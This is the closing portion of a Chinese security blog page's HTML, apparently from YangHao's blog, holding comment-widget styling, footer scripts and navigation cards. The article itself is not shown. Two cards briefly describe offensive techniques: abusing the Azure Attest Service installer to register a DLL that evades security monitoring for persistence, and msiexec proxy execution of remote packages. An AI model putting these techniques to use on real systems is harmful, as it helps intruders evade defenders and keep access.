        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/LOLBAS/">
                                    <span class="chip bg-color">LOLBAS</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="qq,qzone,wechat,weibo,douban" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/valine/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'yJD2aXK8GcbXmInljhvHyB1j-gzGzoHsz',
        appKey: 'p2SkNvakylQnkba2lMvTS09d',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2022/08/29/li-yong-azureattestservice-chi-jiu-hua/">
                    <div class="card-image">
                        
                        <img src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/medias/featureimages/17.jpg" class="responsive-img" alt="利用Azure Attest Service持久化">
                        
                        <span class="card-title">利用Azure Attest Service持久化</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            由于Azure Attest Service服务安装程序未对服务DLL进行安全验证，可通过命令行注册服务DLL，可利用该特点绕过安全软件监控进行权限维持。
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-08-29
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" class="post-category">
                                    权限维持
                                </a>
                            
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/LOLBAS/">
                        <span class="chip bg-color">LOLBAS</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/03/28/windows-installer-an-zhuang-bao-de-gou-jian-he-zhi-xing/">
                    <div class="card-image">
                        
                        <img src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/medias/featureimages/7.jpg" class="responsive-img" alt="Windows Installer安装包的构建和执行">
                        
                        <span class="card-title">Windows Installer安装包的构建和执行</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            生成msi安装包执行自定义载荷的详细步骤方法。msiexec命令执行远程msi安装包、本地dll获得命令执行的方法研究。
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-03-28
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Defense-Evasion/" class="post-category">
                                    Defense Evasion
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Proxy-Execution/">
                        <span class="chip bg-color">Proxy Execution</span>
                    </a>
                    
                    <a href="/tags/Msiexec/">
                        <span class="chip bg-color">Msiexec</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('1120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: Yang Hao&#39;s blog<br />'
            + '文章作者: YangHao<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('5'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2020</span>
            <a href="/about" target="_blank">YangHao</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">49.3k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2020";
                    var startMonth = "08";
                    var startDate = "10";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已缓慢运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已缓慢运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            

			<br>
			
            <span id="showcdn" style='display:none;'>当前CDN节点: <span id="cdn">【未知】</span>&nbsp;|&nbsp;你的ip: <span id="ip">【未知】</span>&nbsp;|&nbsp;你的所在国家/地区: <span id="loc">【未知】</span></span>
            <script>
                	getCDNinfo = function() {
	$.ajax({
		url: "https://cdnjs.cloudflare.com/cdn-cgi/trace",
		success: function(data, status) {
			let areas = "Antananarivo, Madagascar - (TNR);Cape Town, South Africa - (CPT);Casablanca, Morocco - (CMN);Dar Es Salaam, Tanzania - (DAR);Djibouti City, Djibouti - (JIB);Durban, South Africa - (DUR);Johannesburg, South Africa - (JNB);Kigali, Rwanda - (KGL);Lagos, Nigeria - (LOS);Luanda, Angola - (LAD);Maputo, MZ - (MPM);Mombasa, Kenya - (MBA);Port Louis, Mauritius - (MRU);Réunion, France - (RUN);Bangalore, India - (BLR);Bangkok, Thailand - (BKK);Bandar Seri Begawan, Brunei - (BWN);Cebu, Philippines - (CEB);Chengdu, China - (CTU);Chennai, India - (MAA);Chittagong, Bangladesh - (CGP);Chongqing, China - (CKG);Colombo, Sri Lanka - (CMB);Dhaka, Bangladesh - (DAC);Dongguan, China - (SZX);Foshan, China - (FUO);Fuzhou, China - (FOC);Guangzhou, China - (CAN);Hangzhou, China - (HGH);Hanoi, Vietnam - (HAN);Hengyang, China - (HNY);Ho Chi Minh City, Vietnam - (SGN);Hong Kong - (HKG);Hyderabad, India - (HYD);Islamabad, Pakistan - (ISB);Jakarta, Indonesia - (CGK);Jinan, China - (TNA);Karachi, Pakistan - (KHI);Kathmandu, Nepal - (KTM);Kolkata, India - (CCU);Kuala Lumpur, Malaysia - (KUL);Lahore, Pakistan - (LHE);Langfang, China - (NAY);Luoyang, China - (LYA);Macau - (MFM);Malé, Maldives - (MLE);Manila, Philippines - (MNL);Mumbai, India - (BOM);Nagpur, India - (NAG);Nanning, China - (NNG);New Delhi, India - (DEL);Osaka, Japan - (KIX);Phnom Penh, Cambodia - (PNH);Qingdao, China - (TAO);Seoul, South Korea - (ICN);Shanghai, China - (SHA);Shenyang, China - (SHE);Shijiazhuang, China - (SJW);Singapore, Singapore - (SIN);Suzhou, China - (SZV);Taipei - (TPE);Thimphu, Bhutan - (PBH);Tianjin, China - (TSN);Tokyo, Japan - (NRT);Ulaanbaatar, Mongolia - (ULN);Vientiane, Laos - (VTE);Wuhan, China - (WUH);Wuxi, China - (WUX);Xi'an, China - (XIY);Yerevan, Armenia - (EVN);Zhengzhou, China - (CGO);Zuzhou, China - (CSX);Amsterdam, Netherlands - (AMS);Athens, Greece - (ATH);Barcelona, Spain - (BCN);Belgrade, Serbia - (BEG);Berlin, Germany - (TXL);Brussels, Belgium - (BRU);Bucharest, Romania - (OTP);Budapest, Hungary - (BUD);Chișinău, Moldova - (KIV);Copenhagen, Denmark - (CPH);Cork, Ireland -  (ORK);Dublin, Ireland - (DUB);Düsseldorf, Germany - (DUS);Edinburgh, United Kingdom - (EDI);Frankfurt, Germany - (FRA);Geneva, Switzerland - (GVA);Gothenburg, Sweden - (GOT);Hamburg, Germany - (HAM);Helsinki, Finland - (HEL);Istanbul, Turkey - (IST);Kyiv, Ukraine - (KBP);Lisbon, Portugal - (LIS);London, United Kingdom - (LHR);Luxembourg City, Luxembourg - (LUX);Madrid, Spain - (MAD);Manchester, United Kingdom - (MAN);Marseille, France - (MRS);Milan, Italy - (MXP);Moscow, Russia - (DME);Munich, Germany - (MUC);Nicosia, Cyprus - (LCA);Oslo, Norway - (OSL);Paris, France - (CDG);Prague, Czech Republic - (PRG);Reykjavík, Iceland - (KEF);Riga, Latvia - (RIX);Rome, Italy - (FCO);Saint Petersburg, Russia - (LED);Sofia, Bulgaria - (SOF);Stockholm, Sweden - (ARN);Tallinn, Estonia - (TLL);Thessaloniki, Greece - (SKG);Vienna, Austria - (VIE);Vilnius, Lithuania - (VNO);Warsaw, Poland - (WAW);Zagreb, Croatia - (ZAG);Zürich, Switzerland - (ZRH);Arica, Chile - (ARI);Asunción, Paraguay - (ASU);Bogotá, Colombia - (BOG);Buenos Aires, Argentina - (EZE);Curitiba, Brazil - (CWB);Fortaleza, Brazil - (FOR);Guatemala City, Guatemala - (GUA);Lima, Peru - (LIM);Medellín, Colombia - (MDE);Panama City, Panama - (PTY);Porto Alegre, Brazil - (POA);Quito, Ecuador - (UIO);Rio de Janeiro, Brazil - (GIG);São Paulo, Brazil - (GRU);Santiago, Chile - (SCL);Willemstad, Curaçao - (CUR);St. George's, Grenada - (GND);Amman, Jordan - (AMM);Baghdad, Iraq - (BGW);Baku, Azerbaijan - (GYD);Beirut, Lebanon - (BEY);Doha, Qatar - (DOH);Dubai, United Arab Emirates - (DXB);Kuwait City, Kuwait - (KWI);Manama, Bahrain - (BAH);Muscat, Oman - (MCT);Ramallah - (ZDM);Riyadh, Saudi Arabia - (RUH);Tel Aviv, Israel - (TLV);Ashburn, VA, United States - (IAD);Atlanta, GA, United States - (ATL);Boston, MA, United States - (BOS);Buffalo, NY, United States - (BUF);Calgary, AB, Canada - (YYC);Charlotte, NC, United States - (CLT);Chicago, IL, United States - (ORD);Columbus, OH, United States - (CMH);Dallas, TX, United States - (DFW);Denver, CO, United States - (DEN);Detroit, MI, United States - (DTW);Honolulu, HI, United States - (HNL);Houston, TX, United States - (IAH);Indianapolis, IN, United States - (IND);Jacksonville, FL, United States - (JAX);Kansas City, MO, United States - (MCI);Las Vegas, NV, United States - (LAS);Los Angeles, CA, United States - (LAX);McAllen, TX, United States - (MFE);Memphis, TN, United States - (MEM);Mexico City, Mexico - (MEX);Miami, FL, United States - (MIA);Minneapolis, MN, United States - (MSP);Montgomery, AL, United States - (MGM);Montréal, QC, Canada - (YUL);Nashville, TN, United States - (BNA);Newark, NJ, United States - (EWR);Norfolk, VA, United States - (ORF);Omaha, NE, United States - (OMA);Philadelphia, United States - (PHL);Phoenix, AZ, United States - (PHX);Pittsburgh, PA, United States - (PIT);Port-Au-Prince, Haiti - (PAP);Portland, OR, United States - (PDX);Queretaro, MX, Mexico - (QRO);Richmond, Virginia - (RIC);Sacramento, CA, United States - (SMF);Salt Lake City, UT, United States - (SLC);San Diego, CA, United States - (SAN);San Jose, CA, United States - (SJC);Saskatoon, SK, Canada - (YXE);Seattle, WA, United States - (SEA);St. Louis, MO, United States - (STL);Tampa, FL, United States - (TPA);Toronto, ON, Canada - (YYZ);Vancouver, BC, Canada - (YVR);Tallahassee, FL, United States - (TLH);Winnipeg, MB, Canada - (YWG);Adelaide, SA, Australia - (ADL);Auckland, New Zealand - (AKL);Brisbane, QLD, Australia - (BNE);Melbourne, VIC, Australia - (MEL);Noumea, New caledonia - (NOU);Perth, WA, Australia - (PER);Sydney, NSW, Australia - (SYD)".split(";");
			let area = data.split("colo=")[1].split("\n")[0];
			for (var i = 0; i < areas.length; i++) {
				if (areas[i].indexOf(area) != -1) {
					$("#cdn").text(areas[i]);
					$("#ip").text(data.split("ip=")[1].split("\n")[0]);
					$("#loc").text(data.split("loc=")[1].split("\n")[0]);
					break;
				}
			}
			$("#showcdn").css('display','block');
		}
	})
}
$(document).ready(function() {
	getCDNinfo();
});
            </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">














    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>






    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/search.xml", 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>

	
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/materialize/materialize.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/aos/aos.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/js/matery.js"></script>


    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

    
    
    <script async src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    

    

    

    
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
